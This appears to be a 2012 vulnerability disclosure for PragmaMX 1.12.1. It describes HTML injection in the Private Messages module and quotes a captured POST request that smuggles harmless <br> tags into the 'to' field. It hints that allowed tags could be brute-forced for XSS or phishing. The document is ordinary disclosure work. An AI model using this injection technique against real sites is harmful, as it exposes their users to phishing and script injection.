[EN] PragmaMX 1.12.1 - simple "html injection"

# TITLE ....... # PragmaMx 1.12.1 Basic HTML Injection (for users logged-in) ............ #
# DATE ........ # 17.03.2012 ............................................................ #
# AUTOHR ...... # http://hauntit.blogspot.com ........................................... #
# SOFT LINK ... # http://www.pragmamx.org ............................................... #
# VERSION ..... # 1.12.1 ................................................................ #
# TESTED ON ... # LAMP .................................................................. #
# ....................................................................................... #

# 1. What is this?
# 2. What is the type of vulnerability?
# 3. Where is bug :)
# 4. More...

#............................................#
# 1. What is this?
This is very nice CMS, You should try it! ;)

#............................................#
# 2. What is the type of vulnerability?
I called it 'basic html injection' because we can send 'HTML' via this form (of logged-in user).
We can not send 'all HTML tags' but only defined in webapplication.
TO know how we can do XSS or phishing, we can try to 'bruteforce' all HTML tags
(in this scenario tags should be similar to tags we (user) can add in posts.

#............................................#
# 3. Where is bug :)
...cut from Burp...
POST /www/pragmamx.1.12.1/html/modules.php?name=Private_Messages HTTP/1.1
Host: localhost
(...)

subject=aaaaa&message=aaaaaaaaaaaaaaaaa&name=Private_Messages&file=buddy&to_userid=3&op=send&to=test;)<br>test;)<br>test;)<br>test;)<br>&x=59&y=22
...cut from Burp...

#............................................#
# 4. More...

- http://hauntit.blogspot.com
- http://www.google.com
- http://portswigger.net

#............................................#
# Best regards
#